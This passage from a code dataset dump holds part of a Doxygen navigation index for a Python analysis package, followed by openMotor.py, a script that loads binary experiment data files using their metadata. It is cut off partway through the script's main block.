t_8py.html#ae71666498d0f08a9d2c39f65c8be15e1\":[2,0,8,14],\n\"SPDataSet_8py.html#ae9bed330120419db29ade2d021ca34d7\":[2,0,8,9],\n\"SPDataSet_8py.html#aee5e268a39b4f3d7d26b8cd8c2eb0dce\":[2,0,8,8],\n\"SPDataSet_8py.html#af4556d66bac96baab9aed887e66ce083\":[2,0,8,24],\n\"SPDataSet_8py.html#af6b0d8ee29678751051a0b15362f9949\":[2,0,8,1],\n\"SPDataSet_8py_source.html\":[2,0,8],\n\"SPfuncs_8py.html\":[2,0,9],\n\"SPfuncs_8py.html#a0fa8a32d68b3b6a1486926b952bd3676\":[2,0,9,43],\n\"SPfuncs_8py.html#a154be474c56db17750f8232efe410d54\":[2,0,9,9],\n\"SPfuncs_8py.html#a165fa263d040e95cba983de350ee563f\":[2,0,9,47],\n\"SPfuncs_8py.html#a1aca1da7012fa44af8ba6fb057c7ed1b\":[2,0,9,23],\n\"SPfuncs_8py.html#a1ffb0a48d6d36a1260a65e82c4604ce2\":[2,0,9,39],\n\"SPfuncs_8py.html#a2533afa952ea007cfad4a1deb6a607a5\":[2,0,9,3],\n\"SPfuncs_8py.html#a26157a1627869c31bfa6e494e5caf311\":[2,0,9,25],\n\"SPfuncs_8py.html#a29a04cecefb141502380f4e43bc1d06d\":[2,0,9,40],\n\"SPfuncs_8py.html#a40e964ab0b81bcee6065cfa0b5bde422\":[2,0,9,30],\n\"SPfuncs_8py.html#a45a8e352a69cc8a225a32134c87cd120\":[2,0,9,28],\n\"SPfuncs_8py.html#a47dc9e4b5eebaf862bdd545eaff5c371\":[2,0,9,31],\n\"SPfuncs_8py.html#a4dc94cbb119a397cfee47da5a4681676\":[2,0,9,49],\n\"SPfuncs_8py.html#a5a727d85f97fb1e1e7370fbca3b1d1ea\":[2,0,9,6],\n\"SPfuncs_8py.html#a5d91f2e7930fdc007f010659068307f9\":[2,0,9,13],\n\"SPfuncs_8py.html#a5e62fc21df71cfdd96a1c0048b264295\":[2,0,9,35],\n\"SPfuncs_8py.html#a5f881c246a0ac49955b33746df6c379b\":[2,0,9,48],\n\"SPfuncs_8py.html#a68243cfba6d3074cf6381b76546eec71\":[2,0,9,34],\n\"SPfuncs_8py.html#a7265a1148ca13e5fb7961b297a214d13\":[2,0,9,12],\n\"SPfuncs_8py.html#a7590e0785adc48ccbabea8d0eccda514\":[2,0,9,4],\n\"SPfuncs_8py.html#a792112113be3784fc089059c6eed4ff1\":[2,0,9,17],\n\"SPfuncs_8py.html#a7fb1286952274a8a185975238894be9d\":[2,0,9,24],\n\"SPfuncs_8py.html#a7fe775d9cf2e94f97127d699a8b92579\":[2,0,9,38],\n\"SPfuncs_8py.html#a87aac33304db20fd58d7a3625061cca6\":[2,0,9,21],\n\"SPfuncs_8py.html#a8dd105859db0f7ebef805efb3
c08dfb7\":[2,0,9,44],\n\"SPfuncs_8py.html#a97ee543cf8ac7b27443cbfe8ff2e20f3\":[2,0,9,32],\n\"SPfuncs_8py.html#a98d08fa254a21b0b0895f424f7006dbd\":[2,0,9,14],\n\"SPfuncs_8py.html#a98ebdcd3ceb3fa1b7bc74e8caf64b50d\":[2,0,9,36],\n\"SPfuncs_8py.html#a9ae89d50fa931a7cc863400505be38b1\":[2,0,9,11],\n\"SPfuncs_8py.html#a9c4d4bc9bf9302d2690f560af0d9982b\":[2,0,9,29],\n\"SPfuncs_8py.html#a9cc828a26b8f8d72c9c5c86bd951f8e8\":[2,0,9,0],\n\"SPfuncs_8py.html#a9d03b1e8bb9325cdab8fa026d6cdbbe3\":[2,0,9,19],\n\"SPfuncs_8py.html#aa45dbb6291e4944f3ba2718a3d0ee001\":[2,0,9,10],\n\"SPfuncs_8py.html#aa986fff9d1f1b5354e43e972289e5844\":[2,0,9,15],\n\"SPfuncs_8py.html#aaea13a6ab57b30bea3669d56fd489e30\":[2,0,9,37],\n\"SPfuncs_8py.html#ab1cf4f0f232b2ccd32f08baa27263f1b\":[2,0,9,46],\n\"SPfuncs_8py.html#ab8ea55b3a0adfc5e8090a9a40db96e5a\":[2,0,9,41],\n\"SPfuncs_8py.html#aba724f914a5cc838851518564a1f5d84\":[2,0,9,5],\n\"SPfuncs_8py.html#abeb96363789885a36812850590fbfbab\":[2,0,9,42],\n\"SPfuncs_8py.html#aca5c571c3ee666190d0568fbcd72f1a9\":[2,0,9,18],\n\"SPfuncs_8py.html#acb6d178d4325b6c3d8fec4f8197d6819\":[2,0,9,16],\n\"SPfuncs_8py.html#adb6ea3b115ad55320acf0ef8f3ee76eb\":[2,0,9,1],\n\"SPfuncs_8py.html#ae11ccbd488015737fccc78456a5a112f\":[2,0,9,33],\n\"SPfuncs_8py.html#ae33ce81936d04fd605560ec75ffe4a12\":[2,0,9,26],\n\"SPfuncs_8py.html#ae43119e40ee34e8e5f67a1088548adb6\":[2,0,9,22],\n\"SPfuncs_8py.html#ae6715e84e2c13a885096710a851aba3a\":[2,0,9,45],\n\"SPfuncs_8py.html#ae90ba18ae292290722e197cf242d8721\":[2,0,9,7],\n\"SPfuncs_8py.html#aefa37b595edec764011c69c3202787f6\":[2,0,9,2],\n\"SPfuncs_8py.html#af195e86c16fec9d60d1ac20dbe5d1f19\":[2,0,9,27],\n\"SPfuncs_8py.html#af8a48b74a6d4e725e2409329126076a6\":[2,0,9,8],\n\"SPfuncs_8py.html#afac5173c60ef10bac3b5eafb40f7efef\":[2,0,9,20],\n\"SPfuncs_8py_source.html\":[2,0,9],\n\"SPgraphs_8py.html\":[2,0,10],\n\"SPgraphs_8py.html#a04e4e5bc22270694ea4fbca149c08f09\":[2,0,10,28],\n\"SPgraphs_8py.html#a0b2bbf659ee5ec02aa5cb7daad91c280\":[2,0,10,9],\n\"SPgraphs_8py.html#a0c498d7244fa703a63be3bb92d8b9a04\":[2,0,10,27],\n\"SPgraphs_8py.html#a16e1ef7ee56ff5db216016a0a60cc909\":[2,0,10,7],\n\"SPgraphs_8py.html#a25db38c12dcefd76294477b9cd9eaf77\":[2,0,10,25],\n\"SPgraphs_8py.html#a3308a4df9ead1d33bd7d39b4f686e118\":[2,0,10,26],\n\"SPgraphs_8py.html#a3ec55dabf6134d7fff5d974ff35af920\":[2,0,10,18],\n\"SPgraphs_8py.html#a411259eb0330302f50db7c7f60330289\":[2,0,10,10],\n\"SPgraphs_8py.html#a4d2979e542eb057ea841c0405afdc762\":[2,0,10,22],\n\"SPgraphs_8py.html#a629861d51c67e4ca35a7812367b67734\":[2,0,10,12],\n\"SPgraphs_8py.html#a697fa8b8c89c0679ddea4fe27fa68714\":[2,0,10,21],\n\"SPgraphs_8py.html#a69817958c436311d169582bdc6f2c5cf\":[2,0,10,4],\n\"SPgraphs_8py.html#a7b29c4cfd4985b53c2ee0a982eec3760\":[2,0,10,20],\n\"SPgraphs_8py.html#a7c2c5cf3d0cd43b5b3cd9876f30fd51f\":[2,0,10,17],\n\"SPgraphs_8py.html#a7ee3da3bf8fa5dbbe668d1ec1417b62f\":[2,0,10,23],\n\"SPgraphs_8py.html#a898320c98ec7a312c6a1d746636ec0be\":[2,0,10,3],\n\"SPgraphs_8py.html#aa915e36691f2aa1531d635c703e12d00\":[2,0,10,11],\n\"SPgraphs_8py.html#aa9ac03de8263ce020d5549a803aa2ec6\":[2,0,10,1],\n\"SPgraphs_8py.html#ab6f44a36f6d42154485b43e73c4eccf2\":[2,0,10,16],\n\"SPgraphs_8py.html#ac4784095475c5528bbf7b16553e32f69\":[2,0,10,13],\n\"SPgraphs_8py.html#ac48db354437f1d670e7f339066acd8e3\":[2,0,10,15],\n\"SPgraphs_8py.html#ac4f9ba0c7d5b5bfadded9af98ee6890c\":[2,0,10,5],\n\"SPgraphs_8py.html#ac526cfdccd3db288e299b42806782f66\":[2,0,10,0],\n\"SPgraphs_8py.html#ac63344d1aeb7aa62c61dd21af0bb093d\":[2,0,10,19],\n\"SPgraphs_8py.html#ad1253
1edaf503e50679f06d185f67f3b\":[2,0,10,14],\n\"SPgraphs_8py.html#ad33224264e0377c3a57e53584e4c57e3\":[2,0,10,8],\n\"SPgraphs_8py.html#ae5d9b9902d318a31b3eb63b2063417de\":[2,0,10,6],\n\"SPgraphs_8py.html#ae66d67a1bdf6628e901a61a60a2ed75e\":[2,0,10,2],\n\"SPgraphs_8py.html#aebd49435534649c324ad4143d7f92a34\":[2,0,10,24],\n\"SPgraphs_8py_source.html\":[2,0,10],\n\"____init_____8py.html\":[2,0,0],\n\"____init_____8py_source.html\":[2,0,0],\n\"annotated.html\":[1,0],\n\"classes.html\":[1,1],\n\"classobject.html\":[1,0,1],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html\":[1,0,0,0,0,0,7,0],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a0792732403840d5f03968b1888fa42d6\":[1,0,0,0,0,0,7,0,46],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a0c87af10688edd55eb0aea229e5979bb\":[1,0,0,0,0,0,7,0,33],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a0e6950849790e5787695a807f45b0d51\":[1,0,0,0,0,0,7,0,28],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a14656e508d81193e8c71c09d9444e15f\":[1,0,0,0,0,0,7,0,29],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a1e4c1d502ec5ff9a57bf9a330a318a54\":[1,0,0,0,0,0,7,0,26],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a1f51629896a09eb4e5d3c09c44b4823b\":[1,0,0,0,0,0,7,0,16],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a27aa119d0f7a644bb2ca116a89daee82\":[1,0,0,0,0,0,7,0,42],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a2b09966d9ad35b39ea13988a7c361df6\":[1,0,0,0,0,0,7,0,22],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a2e98e78e34f1dabc50fa44aa6a96d6f2\":[1,0,0,0,0,0,7,0,18],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a2ffa7a6de1e0ebd8172db800621eed20\":[1,0,0,0,0,0,7,0,27],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a33ced34e094ccfd1e3891b92478613e7\":[1,0,0,0,0,0,7,0,6],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a3624263a6738178d243635889b719a90\":[1,0,0,0,0,0,7,0,35],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a3a649b10dc80a63cbbb7ed141f90519f\":[1,0,0,0,0,0,7,0,12],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a5343a59b34ffebfc31c1dfd06ddfa889\":[1,0,0,0,0,0,7,0,32],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a5aad808c592bfdbb665105df2947610f\":[1,0,0,0,0,0,7,0,31],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a5ad35e931371981e41221502928547d5\":[1,0,0,0,0,0,7,0,5],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a5b12a3d9fdb93ccbf79a6b7a7893be3f\":[1,0,0,0,0,0,7,0,7],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a6478ef339e0e44839e478fec7340c6b0\":[1,0,0,0,0,0,7,0,20],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a672b7a8c57a535e8c91a4c106283d3a9\":[1,0,0,0,0,0,7,0,8],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a6e2d1324af2938ac6b23d63d9f8a89c7\":[1,0,0,0,0,0,7,0,44],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a6e8c2848a25079fc869ab950445213b8\":[1,0,0,0,0,0,7,0,36],\n\"classrepo_1_1programs_1_1pythonpack
ages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a6f2c3de2aa708d686f5835f10e2d096d\":[1,0,0,0,0,0,7,0,17],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a7482cde5c58c574e2c1ade31e06fcdb4\":[1,0,0,0,0,0,7,0,2],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a76a1caf7a18e9170cbce324d1be0b837\":[1,0,0,0,0,0,7,0,40],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a8250ad2059e08940bf8cd519c30e7a04\":[1,0,0,0,0,0,7,0,43],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a840bb6c513576d34e4f44299a4ca2046\":[1,0,0,0,0,0,7,0,30],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a888b03e4e0141101e71ebd9f46eb494b\":[1,0,0,0,0,0,7,0,38],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a8f689441aa1ded0237cabae51f95954f\":[1,0,0,0,0,0,7,0,15],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a9eac955cac12a62b72d189aa80b82ec6\":[1,0,0,0,0,0,7,0,10],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a9eef53392c7e7ad757cefde737a6cb69\":[1,0,0,0,0,0,7,0,14],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aa0b687b3c937bfb4aa71c4a09cac5eb5\":[1,0,0,0,0,0,7,0,11],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aa2465f64a4035369a0d2a5f0b86d39fa\":[1,0,0,0,0,0,7,0,37],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aa287beda17e46a3969a9321e5904eaed\":[1,0,0,0,0,0,7,0,4],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aa400ad81219e782fe2e29e852b20bb28\":[1,0,0,0,0,0,7,0,9],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ab6db3c53a18a01fec96f0973c394702a\":[1,0,0,0,0,0,7,0,45],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#abc9d3a3ec4d2c9631244078690bfbee6\":[1,0,0,0,0,0,7,0,0],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ac0df54b82a9e993d707f0dafd87a19dd\":[1,0,0,0,0,0,7,0,13],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ac55c6ccc03634d3f670f52e89188779c\":[1,0,0,0,0,0,7,0,34],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#accbfa0185d4e416038e688fc9b55575b\":[1,0,0,0,0,0,7,0,23],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#acf495c99c803a2a1e23cdaeae34da985\":[1,0,0,0,0,0,7,0,25],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ae16a2ee209ef5a9dbc5d9634b3bc6fef\":[1,0,0,0,0,0,7,0,39],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ae9f5e533c3e8e9cd46cc8471ef58c2dd\":[1,0,0,0,0,0,7,0,41],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aee6249fe272c46f07d0f2f32f6c188d2\":[1,0,0,0,0,0,7,0,1],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#af0f40f6c14b1ba1c8de9351a839eb511\":[1,0,0,0,0,0,7,0,3],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#af17c964467367b46a56c14a8c87e84a2\":[1,0,0,0,0,0,7,0,24],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#af6af62c7de4f7bc8f2dd223d05cf2b07\":[1,0,0,0,0,0,7,0,21],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#afe54eeb9f41f503dc478557e4ea2c62a\":[1,0,0,0,0,0,7,0,19],\n\"convert_
8py.html\":[2,0,1],\n\"convert_8py.html#a98b540877656803471dddb9a87fce779\":[2,0,1,0],\n\"convert_8py.html#af9f80b1ee66d98e05cf941352cdda54d\":[2,0,1,1],\n\"convert_8py_source.html\":[2,0,1],\n\"files.html\":[2,0],\n\"functions.html\":[1,3,0],\n\"functions_func.html\":[1,3,1],\n\"functions_vars.html\":[1,3,2],\n\"getSPdata_8py.html\":[2,0,2],\n\"getSPdata_8py.html#a0a88573676ca77c114f061278e10a9e5\":[2,0,2,3],\n\"getSPdata_8py.html#a1dcdb0bd4cf5fc99ddd642fd2e7dcb7b\":[2,0,2,7],\n\"getSPdata_8py.html#a3cd7917344307847daed23d1f68575c4\":[2,0,2,6],\n\"getSPdata_8py.html#a5d2dee28b4f96a6448beb4b18e01fb24\":[2,0,2,9],\n\"getSPdata_8py.html#a98628f2f931f1936c89b4f2c90610736\":[2,0,2,4],\n\"getSPdata_8py.html#aa7e1cd1161dfd5e09ecfea09630c0395\":[2,0,2,11],\n\"getSPdata_8py.html#aadc073490775819f8e7b4eecba84d8c0\":[2,0,2,2],\n\"getSPdata_8py.html#ab7bcb6dc1e35e343ea3d5a9f790c1f42\":[2,0,2,5],\n\"getSPdata_8py.html#abf99dd1de2422300e6e0810c52e352b0\":[2,0,2,0],\n\"getSPdata_8py.html#ad0b93fd48f5d39d35267e0463a7d2e52\":[2,0,2,8],\n\"getSPdata_8py.html#af3d30f9077a6d1c700f7f691a8288334\":[2,0,2,10],\n\"getSPdata_8py.html#afcc30f10d3721c1b098ac36014f598ba\":[2,0,2,1],\n\"getSPdata_8py_source.html\":[2,0,2],\n\"hierarchy.html\":[1,2],\n\"index.html\":[],\n\"loadSPFiles_8py.html\":[2,0,3],\n\"loadSPFiles_8py.html#a1a641072729c4056f58d2f36926b21d1\":[2,0,3,1],\n\"loadSPFiles_8py.html#a39efcdddf61ee790cdf9c4dfbd9e7080\":[2,0,3,14],\n\"loadSPFiles_8py.html#a450ab2273d44a0e76443c6e31b162908\":[2,0,3,11],\n\"loadSPFiles_8py.html#a48f328dcf32e16ad58677599d39be6a1\":[2,0,3,3],\n\"loadSPFiles_8py.html#a65abcc2d7333a2e99d3d3376b616f959\":[2,0,3,13],\n\"loadSPFiles_8py.html#a7a17d807e31989fac9962e7eb5fa3de5\":[2,0,3,8],\n\"loadSPFiles_8py.html#a83183382a5277a75ee1031f6ef284691\":[2,0,3,9],\n\"loadSPFiles_8py.html#a8966ac451acc4e186f9a8c9d299da497\":[2,0,3,12],\n\"loadSPFiles_8py.html#a8ffbf3fed92bc26b4248caebb30ade38\":[2,0,3,18],\n\"loadSPFiles_8py.html#a9058f0ead0c926f493bb7f6ae52a49ea\":[2,0,3,16],\n\"loadSPFiles_8py.html#a92ba966a3b7423fd4d0c7874d3f92e71\":[2,0,3,21],\n\"loadSPFiles_8py.html#a931d7ee8b1015ac25cbca6eee1f77bea\":[2,0,3,19],\n\"loadSPFiles_8py.html#a94905f8c986f1a826f5e14c6c271d3bc\":[2,0,3,6],\n\"loadSPFiles_8py.html#aa6876f5f9096cba233794dd03f719de3\":[2,0,3,7],\n\"loadSPFiles_8py.html#ac05316301b88456778eaedde597c8ed5\":[2,0,3,5],\n\"loadSPFiles_8py.html#acfe87f91d2373c3c41bf59a6024b8a94\":[2,0,3,15],\n\"loadSPFiles_8py.html#ad67a85b681c64920ca3d127dcbb8693a\":[2,0,3,2],\n\"loadSPFiles_8py.html#ad96607a97fb1364b1b8f5a96a6537818\":[2,0,3,0],\n\"loadSPFiles_8py.html#aed6d44730b91f4104569281ef51b335d\":[2,0,3,10],\n\"loadSPFiles_8py.html#af4aa2bb0015793d7b7e493e4aa4f4b8c\":[2,0,3,20],\n\"loadSPFiles_8py.html#af4f5d276f8094f09b7f23a7e43031b4b\":[2,0,3,4],\n\"loadSPFiles_8py.html#af897386d87d4d72567fb337653aa3105\":[2,0,3,17],\n\"loadSPFiles_8py_source.html\":[2,0,3],\n\"namespacemembers.html\":[0,1,0],\n\"namespacemembers_func.html\":[0,1,1],\n\"namespacemembers_vars.html\":[0,1,2],\n\"namespacerepo.html\":[1,0,0],\n\"namespacerepo.html\":[0,0,0],\n\"namespacerepo_1_1programs.html\":[1,0,0,0],\n\"namespacerepo_1_1programs.html\":[0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages.html\":[0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages.html\":[1,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr.html\":[0,0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr.html\":[1,0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.html\":[0,0,0,
0,0,0,7],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.html\":[1,0,0,0,0,0,7],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html\":[0,0,0,0,0,0,8],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html\":[1,0,0,0,0,0,8],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPgraphs.html\":[0,0,0,0,0,0,9],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPgraphs.html\":[1,0,0,0,0,0,9],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1convert.html\":[1,0,0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1convert.html\":[0,0,0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html\":[0,0,0,0,0,0,1],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html\":[1,0,0,0,0,0,1],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1loadSPFiles.html\":[0,0,0,0,0,0,2],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1loadSPFiles.html\":[1,0,0,0,0,0,2],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html\":[0,0,0,0,0,0,3],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html\":[1,0,0,0,0,0,3],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openMotor.html\":[0,0,0,0,0,0,4],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openMotor.html\":[1,0,0,0,0,0,4],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1scrap.html\":[0,0,0,0,0,0,5],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1scrap.html\":[1,0,0,0,0,0,5],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1sdtime.html\":[1,0,0,0,0,0,6],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1sdtime.html\":[0,0,0,0,0,0,6],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1test__SPfuncs.html\":[0,0,0,0,0,0,10],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1test__SPfuncs.html\":[1,0,0,0,0,0,10],\n\"namespaces.html\":[0,0],\n\"openCPT_8py.html\":[2,0,4],\n\"openCPT_8py.html#a123c419a688aefb0d6d482eca7512d36\":[2,0,4,1],\n\"openCPT_8py.html#a3e5077d300b3260fd9aa1487e0e15a3e\":[2,0,4,3],\n\"openCPT_8py.html#a6195f6525b22b29221384f9235fe1062\":[2,0,4,2],\n\"openCPT_8py.html#a629d9addea1bbee10544941d7c301ba8\":[2,0,4,4],\n\"openCPT_8py.html#a87910852db48cafc314ea9372f00a401\":[2,0,4,6]\n};\n" }, { "alpha_fraction": 0.6429715156555176, "alphanum_fraction": 0.6964457035064697, "avg_line_length": 33.70000076293945, "blob_id": "d8d406a62f38249405628dc49223181197921565", "content_id": "15db5189a7a8d37bccfbff19ece329984cbb02fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3123, "license_type": "no_license", "max_line_length": 164, "num_lines": 90, "path": "/openMotor.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom os import path\nimport os\nimport re\n\n\ndef loadBins(root_path, useMetaFile=True):\n\tdirname=path.dirname(root_path) \n\trootname=path.basename(root_path)\t\n\tr=re.compile('{0}( \\d+)?\\.bin'.format(rootname))\n\tdlist=os.listdir(dirname);\n\tdlist=[st for st in dlist if r.match(st)]\n\tdlist.sort( key=lambda st: int(r.match(st).groups()[0]) ) # dlist is now sorted\n\t\n\tdat_list=[loadAbin(path.join(dirname, fname), useMetaFile=useMetaFile) for fname in dlist]\n\t# Combine these into a single file...\n\n\tdat=np.hstack(dat_list)\n\t#datnames=dat_list[0].keys()\n\treturn dat\n\n\n\ndef loadAbin(filepath, nVars=1, useMetaFile=True, endian=''):\n\tif 
useMetaFile:\n\t\tfname_components=path.splitext(filepath)[0].split(' ')\n\t\tif fname_components[-1].isdigit():\n\t\t\tfname_components.pop()\n\t\tmeta_file_path=' '.join(fname_components) + '.npmeta'\n\t\tnpmeta_path=' '.join(fname_components) + '.npmeta'\n\t\tif path.exists(npmeta_path):\n\t\t\tmfile=open(npmeta_path)\n\t\t\tlines=mfile.readlines()\n\t\t\t#totalDataType=[line.replace(',', ' ').split() for line in lines if not line.isspace() and not line.startswith('#') ]# should be tuples of e.g. ('signal', 'f8');\n\t\t\tpairs=[line.strip().split(',') for line in lines if not line.isspace() and not line.startswith('#') ]# should be tuples of e.g. ('signal', 'f8');\n\t\t\tdefaultDtype='>f4'\n\t\t\ttotalDataType=[]\n\t\t\tfor p in pairs:\n\t\t\t\tname=p[0].strip()\n\t\t\t\tif len(p)>1:\n\t\t\t\t\tdt=p[1].strip()\n\t\t\t\t\tdefaultDtype=dt;\n\t\t\t\telse:\n\t\t\t\t\tdt=defaultDtype;\n\t\t\t\ttotalDataType.append((name, dt));\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t#print(\"totalDataType: {0}\".format(totalDataType))\n\t\telse:\n\t\t\tmeta_file_path=' '.join(fname_components) + '.meta'\n\t\t\tif path.exists(meta_file_path):\n\t\t\t\tmfile=open(meta_file_path)\n\t\t\telif path.exists(meta_file_path+'.txt'):\n\t\t\t\tmfile=open(meta_file_path+'.txt')\n\t\t\telse:\n\t\t\t\traise IOError\n\t\t\tsigNames=mfile.readlines()\n\t\t\tsigNames=[name.strip() for name in sigNames]\n\t\t\tif sigNames[0]=='Sidereal Days':\n\t\t\t\tsigNames=sigNames[1:]\n\t\t\tnVars=len(sigNames)\n\t\t\tsigDataType=[(name, endian+'f8') for name in sigNames]\n\t\t\ttimeDataType=[('sd', endian+'f8')]\n\t\t\ttotalDataType=timeDataType+sigDataType\n\n\telse:\n\t\ttimeDataType=[('sd', endian+'f8')]\n\t\tsigDataType=[('s{0}'.format(n), endian+'f8') for n in range(1,nVars+1)]\n\t\ttotalDataType=timeDataType+sigDataType\n\n\n\n\tprint(\"total dtype: {0}\".format(totalDataType))\n\tdat=np.fromfile(filepath, totalDataType)\n\n\treturn dat;\n\nif __name__==\"__main__\":\n\t#ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5253.67 Bundle/'\n\t#fpath=ddir+'SP_motor 5253.67 sensors 8.bin'\n\tddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_aparatus 5256.38 Bundle/'\n\t#ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5256.38 Bundle/'\n\tfname='SP_aparatus 5256.38 Medium 6.bin'\n\tddir2='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5253.67 Bundle/'\n\tfname2='SP_motor 5253.67 